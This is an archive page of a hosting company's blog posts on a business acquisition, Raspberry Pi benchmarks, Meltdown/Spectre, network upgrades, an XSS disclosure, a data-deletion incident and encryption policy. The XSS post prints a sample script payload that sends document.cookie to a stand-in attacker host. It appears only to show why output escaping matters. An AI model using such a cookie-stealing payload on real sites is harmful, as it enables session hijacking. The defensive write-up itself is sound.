Retrosnub Acquisition

June 4th, 2018 by

A Mythic Beast eating a Retrosnub (artist’s impression)

Just before Christmas we were approached by Malcolm Scott, director of Retrosnub, a small cloud hosting provider in Cambridge. His existing connectivity provider had run out of IPv4 addresses, and had decided to deal with this by charging £2 per IPv4 address per month to encourage existing customers to return unused IPv4 addresses. As a cloud hosting provider with a substantial number of virtual machines (VMs) on a small number of hosts, Retrosnub saw its monthly colocation bill triple as a result.

Aware of my presentation on IPv6-only hosting at UKNOF, Malcolm knew that opportunities for significant expansion were severely limited by the difficulty of obtaining large amounts of IPv4 address space. Retrosnub faced a future of bankruptcy or remaining a very niche provider. Its connectivity provider seemed strongly in favour of Retrosnub going bust so that they could reclaim and re-sell the IPv4 space for higher-margin services.

There are no expansion opportunities for new cloud hosting providers.

As a larger provider with our own address space, we had sufficient spare capacity in our virtual machine cloud to absorb the entire Retrosnub customer base with no additional expenditure. Our work in supporting IPv6-only virtual machines will also make it easier to significantly reduce the number of IPv4 addresses required to support Retrosnub services. We struck a deal and agreed to buy Retrosnub’s customer base.

Combining operations

Since agreeing the deal, we’ve been working hard to merge our operations with minimum disruption.

The top priority was domain registrations, because domains expire if you don’t renew them. Doing a bulk transfer of domain names between registrars is something which Nominet, the body responsible for UK domains, makes extremely easy: it just requires changing the “tag” on all the domains.

Unfortunately, just about all other TLDs follow a standard ICANN process, which requires that a domain be renewed for a year at the time of transfer, and that the owner of the domain approve the transfer. If you were designing a process to destroy competition in a market by making it hard for resellers to move between registrars, it would look quite like this.

We’ve now got the bulk of domains transferred, and the next steps will be to migrate the DNS records from Retrosnub to Mythic Beasts so that our control panel can be used to change the records.

At the same time, we rapidly formulated a plan to migrate all the virtual machines across in order to stem the financial losses. Moving the VMs required an unavoidable change of IP address, and we also wanted to migrate them from their existing platform (Citrix XenServer with para-virtualisation) to our own platform (KVM with full hardware virtualisation).

To ease the transition, we arranged for a pair of servers to do IP forwarding: one in our cloud that forwarded traffic for the new IP address to the VM in the Retrosnub cloud until it had been migrated in, and another in the Retrosnub cloud that forwarded traffic for the old IP address once the VM had been moved. This allowed us to give customers a one-week window in which to complete their IP migration, rather than forcing it to be done at the moment we actually moved the VM.

In the process of this migration, all customers received a significant bandwidth upgrade, and the majority received disk, RAM and CPU upgrades too.

We completed this on schedule, before the quarterly colocation bill arrived, so instead of paying the much-increased bill we cancelled the contract and removed the servers from the facility.

Next steps

Our next step will be to migrate all the web and email hosting customers into our standard shared hosting environment. There is some time pressure here, as Google has plans for Chrome to start marking all non-HTTPS websites as insecure. We offer one-click HTTPS hosting using Let’s Encrypt on all of our hosting accounts.

Raspberry Pi 3B+

March 14th, 2018 by

Today is Pi Day, when we celebrate all things mathematical. This is a super special Pi Day, because a new Raspberry Pi has been released.

It takes the previously excellent Raspberry Pi 3 (or 3B, to give it its full name) and upgrades it with an extra 200MHz of CPU speed and Gigabit Ethernet over USB 2. It fixes many of the netboot issues which Pete highlighted at the last big Pi Birthday Party, and will soon have a new, smaller and cheaper Power over Ethernet HAT. These new features are of particular interest for our Raspberry Pi Cloud service, as we use netbooted Pis with network file storage, and Power over Ethernet to enable remote power cycling.

Raspberry Pi 3B+.

We’ve had one to play with, and we’ve run our favourite benchmark – Raspberry Pi’s own website. We installed the full stack (MySQL, WordPress and PHP 7) under Debian Stretch onto a Pi 3B and a Pi 3B+, and tried it out with 32 concurrent connections. We’re running near-identical setups on the two servers: both have their files stored over the network on an NFS file server, and it’s the same operating system and applications; only the kernel differs.

Model Pages/second
Raspberry Pi 3B 3.15
Raspberry Pi 3B+ 3.65

The new model is about 15% faster than the old one, which is almost exactly what we’d expect from the boost in clock speed; WordPress is CPU-limited.
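
If you want to run a similar test yourself, a crude version needs nothing beyond the Python standard library. This is a sketch rather than the exact tool we used, and the URL, concurrency and duration below are placeholder assumptions:

```python
# Rough concurrency benchmark: hammer one URL with a fixed number of workers
# for a while and report pages/second. Illustrative only.
import time
import urllib.request
from concurrent.futures import ThreadPoolExecutor

URL = "http://pi-under-test.example/"   # hypothetical WordPress install under test
CONCURRENCY = 32                        # matches the 32 concurrent connections above
DURATION = 60                           # seconds to run for

def worker(deadline: float) -> int:
    pages = 0
    while time.time() < deadline:
        with urllib.request.urlopen(URL, timeout=30) as response:
            response.read()             # fetch and discard the full page body
        pages += 1
    return pages

deadline = time.time() + DURATION
with ThreadPoolExecutor(max_workers=CONCURRENCY) as pool:
    totals = pool.map(worker, [deadline] * CONCURRENCY)

print(f"{sum(totals) / DURATION:.2f} pages/second")
```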

Checksumming the 681MB database file shows off the Gigabit Ethernet rather effectively. All our storage is over the network, so reading files is effectively a benchmark of network speed.

Model Elapsed time Data rate
Raspberry Pi 3B 54.4s 11.25MB/s
Raspberry Pi 3B+ 28.1s 22.1MB/s

This is very nearly twice as fast as the previous model.
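
The read-throughput side of this is easy to reproduce: read a large file off the NFS mount, hash it, and divide the size by the elapsed time. A minimal sketch, with a placeholder path standing in for the database dump:

```python
# Time how fast a large file can be read over the network by checksumming it.
# The path is a placeholder; use any file big enough that caches don't dominate.
import hashlib
import os
import time

PATH = "/mnt/nfs/database-dump.sql"     # hypothetical file on the NFS mount

digest = hashlib.sha256()
start = time.time()
with open(PATH, "rb") as f:
    for chunk in iter(lambda: f.read(1024 * 1024), b""):
        digest.update(chunk)
elapsed = time.time() - start

size_mb = os.path.getsize(PATH) / 1e6
print(f"{digest.hexdigest()}  {size_mb / elapsed:.1f}MB/s in {elapsed:.1f}s")
```

On a second run the client-side page cache can make the figure look implausibly good, so either drop caches between runs or use a file larger than the Pi’s RAM.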

When is it coming to the Raspberry Pi Cloud?

The Raspberry Pi 3B+ is an obvious upgrade for our Raspberry Pi Cloud. We need to wait for the PoE HAT to become available, as that will give us better density and lower capital costs. However, the 3B+ consumes more power than the 3B, so we also need to do some thermal and airflow work before we can make it generally available.

Flatpak: pre-assembled furniture applications for Linux

February 23rd, 2018 by

Flatpack is furniture you build yourself. Flatpak is preassembled applications for Linux. This is apparently not at all confusing. (image thanks to https://www.flickr.com/photos/51pct/)

Flatpak provides Linux desktop applications in a secure sandbox which can be installed and run independently of the underlying Linux distribution. Application developers can produce one Flatpak and select the versions of the libraries that their application is built, tested and run with, so users on any Linux OS get exactly what the application developer intended.

Flathub is a distribution service which makes sure that Flatpaks are available for popular Linux desktop applications. At its heart is a private cloud running Buildbot, which builds popular free and open source desktop apps in Flatpak format. This lives in Mythic Beasts’ Cambridge data centre.

At Mythic Beasts we like this idea so much we offered them lots of free bandwidth (100TB) to help get them started. We’ve now upgraded this with a pair of virtual machines in our core Docklands sites to provide redundancy and more grunt for traffic serving.


Some of their users noticed and were appreciative immediately:

2017-02-23 16:30:00 irc: wow! Flathub is *so* much faster i’m getting like 10 MB/s compared to less than 1 this morning … and the search is now instant
2017-02-26 11:35 Persi: Flathub is _really_ fast now, great job to whoever is responsible
🙂

Meltdown and Spectre

January 17th, 2018 by

A rack of Pi 3s… possibly the only cloud computers immune to Spectre?

There’s been a lot of activity in the news regarding two new security issues called Meltdown and Spectre.

The security issues are newsworthy because they’re different to any security issues we’ve seen before. They’re not an issue in software, but in your computer itself. As a result the vulnerabilities cross multiple operating systems – Windows/Linux/OSX and multiple devices – Laptop/Desktop/Server/Phone, and they’re also a lot harder to fix.  Meltdown affects only Intel processors.  Spectre also affects AMD, Power, RISC and some ARM CPUs.

If you’d like to know how the vulnerabilities work, Eben Upton wrote up a clear explanation for Raspberry Pi – the only common functional computer that isn’t affected.

At present the fixes for Meltdown are effective but can cause significant slowdowns. Fixes for Spectre are incomplete, and we have had reports that they can cause instability on the Haswell and Broadwell families of Intel CPUs (which we own). Spectre is difficult and slow to exploit because it relies on reading memory one bit at a time: at around 1,500 bytes per second, a full memory dump of one of our virtual server hosts (256GB of RAM) would take around six years to complete.
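
That six-year figure is just arithmetic on the numbers above, as a quick sanity check shows:

```python
# Time to read 256GB of RAM at roughly 1,500 bytes per second.
ram_bytes = 256 * 2**30                    # 256GB of RAM, treated as GiB
rate_bytes_per_second = 1500
seconds = ram_bytes / rate_bytes_per_second
print(seconds / (365.25 * 24 * 3600))      # prints roughly 5.8 (years)
```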

Impact

Both issues allow information leakage, so that less privileged processes on a server can read secret data from more privileged processes on the same CPU. Any computer that accepts instructions from an untrustworthy source is at risk. We’ve reviewed the impact across all of our services, and have applied or will be applying patches as required. The impact on live hosting platforms is as follows:

Shared hosting servers

Our web hosting and shell account hosting platforms may have untrustworthy users on them. These servers have already been fully patched against Meltdown and fixes for Spectre will be applied as they become available.

Virtual server hosts

Our Virtual Server Cloud uses KVM with hardware virtualisation, which is not vulnerable to Meltdown. Spectre patches for the kernel are being worked on; these require new microcode for the CPU, and KVM will also need to be updated to provide a complete fix. When these updates are available and have been demonstrated to be stable, we will apply them to our host servers.

This will require a restart of our VM hosts and all guest VMs. Customers will be notified in advance of any required restart, and each of our data centres will be restarted at a different time to minimise disruption to customers with split-site services.

Virtual server guests

Whilst the use of KVM with hardware virtualisation ensures that Meltdown cannot be used to break the isolation between virtual server guests, virtual servers themselves are potentially vulnerable to both Meltdown and Spectre.   Customers should ensure that their servers are patched and rebooted if they have untrusted users or execute untrusted code.
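
Recent kernels (around 4.15 onwards) report their own mitigation status under /sys, which gives guest administrators a quick way to check where they stand. A small sketch of that check:

```python
# Print the kernel's own report of Meltdown/Spectre mitigation status.
# The sysfs files appear on kernels from roughly 4.15 onwards; older kernels
# simply won't have the directory.
from pathlib import Path

vuln_dir = Path("/sys/devices/system/cpu/vulnerabilities")
if not vuln_dir.is_dir():
    print("No vulnerability reporting: kernel predates the mitigation work")
else:
    for entry in sorted(vuln_dir.iterdir()):
        print(f"{entry.name}: {entry.read_text().strip()}")
```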

Dedicated servers

Dedicated servers are at no significant risk unless you allow untrusted third parties to upload and execute code. If that’s the case, managed customers can contact support@mythic-beasts.com and we’ll apply the Meltdown and Spectre fixes and reboot at a mutually convenient time.

Raspberry Pi 3 servers

As mentioned above, the Raspberry Pi is not affected and no action is needed.

All other systems

We have reviewed the risk to all other systems and are applying patches as required. This has included patching, as a high priority, all staff desktops and laptops; websites are allowed to execute JavaScript, which can be used to mount a successful Meltdown attack.

Capacity upgrades, cheaper bandwidth and new fibre

December 8th, 2017 by

We don’t need these Giant Scary Laser stickers yet.

We’ve recently upgraded both of our LONAP connections at our two London POPs to 10Gbps, bringing our total external capacity to 62Gbps.

We’ve been a member of LONAP, the London Network Access Point, since we first started running our own network. LONAP is an internet exchange, mutually owned by several hundred members. Each member connects to LONAP’s switches and can arrange to exchange traffic directly with other members without passing through another internet provider. This makes our internet traffic more stable, because we have more available routes; faster, because connections go directly between source and recipient with fewer hops; and usually cheaper too.

Since we joined, both we and LONAP have grown. Initially we had two 1Gbps connections, one in each of our two core sites; if one failed, the other could take over the traffic. Recently we’ve been running both connections near capacity much of the time, and in the event of a failure of either link we’d have to fall back to a less direct, slower and more expensive route. Time to upgrade.

The upgrade involved moving from a copper Cat5e connection to optical fibre. As a company run by physics graduates, this is an excellent excuse to add yet more LASERs to our collection. Sadly the LASERs aren’t very exciting: at 1310nm they’re invisible to the naked eye, and for safety reasons they’re very low-powered (~1mW). Not only will they not set things on fire (bad), they also won’t blind you if you accidentally look down the fibre (good). This is not universally true of all optical fibre though; DWDM systems can have nearly 100 invisible laser beams in the same fibre, each at 100x the power output. Do not look down optic fibre!

The first upgrade, at Sovereign House, went smoothly, bringing online the first 10Gbps LONAP link. Harbour Exchange proved a little more problematic. We initially had a problem with an incompatible optical transceiver. Once that was replaced, we saw a further issue with the link being unstable, which was resolved by changing the switch port and optical transceiver at LONAP’s end. We then had low-level bit errors resulting in packet loss for large packets; this was eventually traced to a marginal optical patch lead. Many thanks to Rob Lister of LONAP support for quickly resolving this for us.

With the upgrade completed, we now have two 10Gbps connections to LONAP, in addition to our two 10Gbps connections into the London Internet Exchange and multiple 10Gbps transit uplinks, as well as some 1Gbps private connections to some especially important peers.

To celebrate this we’re dropping our excess bandwidth pricing to 1p/GB for all London-based services. The upgrades leave us even better placed to offer very competitive quotes on high-bandwidth servers, as well as IPv6 and IPv4 transit in Harbour Exchange, Meridian Gate and Sovereign House. Please contact us at sales@mythic-beasts.com for more information.

Education, and the teacher becomes the student.

October 6th, 2017 by

Learn more about XSS with Google

For a long time we’ve sponsored Gwiddle, a project providing free hosting accounts for students, which outgrew its hosting on Microsoft Azure. They’ve now become a fully fledged charity, The Gwiddle Foundation, and we’ve had to upgrade the servers we donated to accommodate their ever-expanding user base.

Part of their security team is the very talented Aaron Esau (15), who recently applied his penetration-testing skills to our website and picked up a difficult-to-exploit bug.

On our page that allows you to search for domain names, our code embedded the search terms in the results page without appropriately escaping the content. This is a classic cross-site scripting (XSS) bug. Exploiting it was far from trivial, as the search term had to be short and drawn from a restricted character set.

Aaron managed to craft an exploit using an ingeniously short payload to extract a session cookie and has posted a full write-up of the vulnerability and exploit.

If you had recently logged into our control panel, not logged out, and then visited a malicious page containing this exploit, the attacker could steal a cookie which would, in theory, give them access to your control panel pages. However, we practise defence in depth, and our cookies are tied to an IP address, so simply stealing the session cookie doesn’t give you access unless you also share a source IP address. This is an example of NAT and IPv4 being less secure than having IPv6.
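
As a general illustration of the idea (not our actual control panel code), a session cookie can be bound to the client address by mixing the IP into an HMAC, so that a stolen cookie presented from a different address fails validation:

```python
# Sketch of tying a session cookie to a source IP address with an HMAC.
# Illustrative only: the key, cookie format and addresses are made up.
import hashlib
import hmac
import secrets

SECRET_KEY = b"server-side secret, never sent to clients"

def issue_cookie(session_id: str, client_ip: str) -> str:
    mac = hmac.new(SECRET_KEY, f"{session_id}|{client_ip}".encode(), hashlib.sha256)
    return f"{session_id}.{mac.hexdigest()}"

def check_cookie(cookie: str, client_ip: str) -> bool:
    session_id, _, presented_mac = cookie.partition(".")
    expected = hmac.new(SECRET_KEY, f"{session_id}|{client_ip}".encode(), hashlib.sha256)
    return hmac.compare_digest(presented_mac, expected.hexdigest())

cookie = issue_cookie(secrets.token_hex(16), "198.51.100.7")
print(check_cookie(cookie, "198.51.100.7"))   # True: request from the same address
print(check_cookie(cookie, "203.0.113.9"))    # False: stolen cookie, different address
```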

Once Aaron brought the bug to our attention we swiftly fixed the page and sent him an Amazon voucher to thank him for his time and responsible disclosure.

We should emphasise that we do not believe that anyone has ever attempted to exploit this bug, and that the IP restrictions on session cookies mean that the consequences were fully mitigated.

Nonetheless, it’s embarrassing for us to have such a stupid bug in our code, and we’ve been investigating how it occurred. It seems that it crept in because the domain ordering pages use a different form framework from everything else. Most of our pages have HTML generated by a template, and wherever dynamic data is included, it’s run through a filter to escape any HTML characters.

The domain ordering pages take a different approach, with much of the HTML being generated by a form module which we then include verbatim in our output. Obviously the HTML in this data mustn’t be escaped, as that would break the form; the form module is responsible for escaping any user input. Unfortunately, there are some other parts of the page which don’t come from the form module, and so do need to be escaped. It’s not very clear from the template code which is which, leading to the bug of some fields not being escaped.
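
The underlying fix is the textbook one: escape user-supplied data at the point it is interpolated into HTML. A minimal sketch using Python’s html module; our templates do this via a filter rather than by hand, but the principle is identical:

```python
# The difference between embedding a search term verbatim and escaping it first.
import html

search_term = '<script>new Image().src="//attacker.example/?c="+document.cookie</script>'

unsafe_page = f"<p>Results for {search_term}</p>"            # reflected XSS: the script runs
safe_page = f"<p>Results for {html.escape(search_term)}</p>" # inert: rendered as plain text

print(unsafe_page)
print(safe_page)
```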

Raspbian Stretch now available in the Raspberry Pi Cloud

August 31st, 2017 by

A very short service announcement.

Raspbian Stretch is now available for Raspberry Pis hosted in our Raspberry Pi Cloud. This joins Raspbian Jessie and Ubuntu Xenial as available images. With all of these you can upload an SSH key through our control panel and log in directly. Re-imaging and rebooting can both also be done directly from our control panel.

Re-imaging your Raspberry Pi will reset the image and delete all data on your Cloud Pi.

On the server side the most significant upgrade is PHP 7, which should double the performance of PHP-based applications running on the Raspberry Pi.

rm -rf /var

August 10th, 2017 by

Within Mythic Beasts we have an internal chat room that uses IRC (it’s like Slack, but free, and it securely stores all the history on our servers). Our monitoring system is called Ankou, named after Death’s henchman who watches over the dead, and it has an IRC bot that alerts into our chat room.

This story starts with Ankoubot, who was the first to notice something was wrong with the world.

15:25:31 ankoubot managed vds:abcdefg-ssh [NNNN-ssh]: 46.235.N.N => bad banner from `46.235.N.N’: [46.235.N.N – VDShost:vds-hex-f]
15:25:31 ankoubot managed vds:abcdefg-web [NNNN-web]: http://www.abcdefg.co.uk/ => Status 404 (<html> <head><title>404 Not Found</title></head> <body bgcolor=”white”> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.10.3</center> </body> </html…) [46.235.N.N www.abcdefg.co.uk VDShost:vds-hex-f]

15:31:42 pete: I can’t get ssh in, I’m on the console.

15:38:16 pete: This is an extremely broken install. ssh is blocked, none of the bind mounts work

Debugging is difficult because /var/log is missing, systemd appears completely unable to function, and we have no working logging. Unable to get ssh to start, and fighting multiple broken tools due to missing mounts, we restart the server and mail the customer explaining what we’ve discovered so far. The restart doesn’t help: the server hangs attempting to configure NFS mounts.

Boot to recovery media completes, ready for a restore from backup.

16:08:36 ankoubot managed vds:abcdefg-ssh [NNNN-ssh]: back to normal
16:08:36 ankoubot managed vds:abcdefg-web [NNNN-web]: back to normal

The customer confirms everything is restored and functional, and gives permission to anonymously write up the incident for our blog, including the following quote:

Mythic Beasts had come highly recommended to me for the level of support provided, and when it came to crunch time they were reacting to the problem before I’d even raised a support ticket.
This is exactly what we were looking for in a managed hosting provider, and I’m really glad we made the choice. Hopefully, however, I won’t be causing quite the same sort of problem for a looooong while.

In total the customer was offline for slightly over 30 minutes, after what can best be described as a catastrophic administrator error.

FRμIT: Federated RaspberryPi MicroInfrastructure Testbed

July 3rd, 2017 by

The participants of the FRμIT distributed Raspberry Pi cloud project.

FRμIT is an academic project looking at building and connecting micro-data-centres together, and at what can be achieved with this kind of architecture. Currently they have hundreds of Raspberry Pis, and they’re aiming for 10,000 by the end of the project. They invited us to join them: we’ve already solved the problem of building a centralised Raspberry Pi data centre, and they wanted to know if we could advise and assist their project. We recently joined them in the Cambridge University Computer Lab for their first project meeting.

Currently we centralise computing in data centres, as it’s cheaper to pick up the computers and move them to the heart of the internet than it is to bring extremely fast (10Gbps+) internet everywhere. This model works brilliantly for many applications, because a central computing resource can support large numbers of users, each connecting over their own smaller connection. It works less well when the source data is large and located somewhere with poor connectivity, for example a video stream from a nature reserve. There are also other types of application, such as SETI@home, which have huge computational requirements on small datasets, where distributing work over slow links works effectively.

Gbps per GHz

At a recent UK Network Operators’ Forum meeting, Google gave a presentation about their data centre networking, in which they built precisely the opposite architecture to the one proposed here. They have a flat LAN with the same bandwidth between any two points, so that all CPUs are equivalent. This involves around 1Gbps of bandwidth per 1GHz of CPU. It simplifies your software stack, as applications don’t have to try to place CPU close to the data, but it involves an extremely expensive data centre build.

This isn’t an architecture you can build with the Raspberry Pi. Our Raspberry Pi cloud is about as close as you can manage, with 100Mbps per four 1.2GHz cores. This is about 1/40th of the network capacity required to run Google-architecture applications. But that’s okay: other applications are available. As FRμIT scales geographically, the bandwidth will become much more constrained – it’s easy to imagine a cluster of 100 Raspberry Pis sharing a single low-bandwidth uplink back to the core.

This immediately leads to all sorts of interesting and hard questions about how to write a scheduler, as you need to know in advance the likely CPU/bandwidth mix of your distributed application in order to work out where it can run. Local data distribution becomes important – 100+ Pis downloading updates and applications may saturate the small backbone links. They also have a variety of hardware types, from the original Pi Model B to the newer and faster Pi 3, and possibly even some Pi Zero Ws.

Our contribution

We took the members of the project through how our Raspberry Pi Cloud is built, including how a Pi is provisioned, how the network and operating system are set up, and the back-end for the entire process from clicking “order” to a booted Pi awaiting customer login.

In discussions of how to manage a large number of federated Raspberry Pis, we were pleased to find considerable agreement with our method of managing lots of servers: use OpenVPN to build a private network and route a /48 of IPv6 space to it. This enables standard server management tools to work, even where the Raspberry Pis are geographically distributed behind NAT firewalls and other creative network configurations.

Donate your old Pi

If you have an old Raspberry Pi, perhaps because you’ve upgraded to a new Pi 3, you can donate it directly to the project through PiCycle. They’ll then recycle your old Raspberry Pi into the distributed compute cluster.

We’re looking forward to their discoveries and enjoyed working with the researchers. When we build solutions for customers, we aim to minimise the number of unknowns to de-risk the solution. By contrast, tackling difficult unsolved problems is the whole point of research: if they already knew how to build the system, they wouldn’t bother trying.

Encryption is vital

June 7th, 2017 by


We refuse to bid for government IT work because we can’t handle the incompetence.

At Mythic Beasts we make use of free, secure encryption all the time. As with all powerful tools (roads, trains, aeroplanes, GPS navigation, computers, kitchen knives, vans and Casio watches), things that are very useful for day-to-day life are also useful to criminals and terrorists. It’s very popular for our politicians and the Home Office, especially our current prime minister King Canute Theresa May and leader of The Thick Party, to suggest that fully secure encryption should be banned and replaced with a weaker version that will reveal all of your secrets, but only to the UK security services.

We disagree and think this is a terrible idea. There’s the basic technical objection that a backdoor is a backdoor, and keeping knowledge of the backdoor secret is essentially impossible. There’s a recent practical demonstration of this: the NSA knew of an accidental backdoor in Windows and kept it secret. It was leaked, resulting in the thankfully not very effective WannaCry virus, which disabled substantial fractions of the NHS. The government is very good at scope creep: the Food Standards Agency refused to disclose why it needs the power to demand your entire internet history. We think it fundamentally wrong that MPs excluded themselves from the Investigatory Powers Act. Then there are simple commercial objections: it’s a slight commercial disadvantage if every UK product has an ‘Insecure By Order of The Home Office’ sticker on the front when your foreign competitors’ products don’t.

However, mathematics does not care what our politicians wish and refuses to change according to their desires. Strong cryptography is free, available on every computer, and can be given away on the front of a magazine. Taking away secure cryptography is going to involve dragging a PlayStation out of your teenagers’ hands, quite literally stealing from children. Of course, secure communications will still be available to any criminal who can illegally access some dice and a pencil.

It’s a good job you can’t build encryption machines with children’s toys.

At Mythic Beasts we make extensive use of free, open source cryptography. OpenSSH protects our administrative access to the servers we run and the customers we manage. OpenSSL protects all our secure web downloads, including last month’s million or so copies of Raspbian, ensuring that children with a Raspberry Pi don’t have their computer compromised. We make extensive use of free certificates through Let’s Encrypt, and we’ve deployed tens of thousands of upgraded packages to customers, securely verified by GnuPG.

Without these projects, vast quantities of the internet would be insecure, so we’ve made donations to OpenSSH, GnuPG and Let’s Encrypt to support their ongoing work. We’d like to donate to OpenSSL too, but we can’t easily see how to pay them from a UK bank account.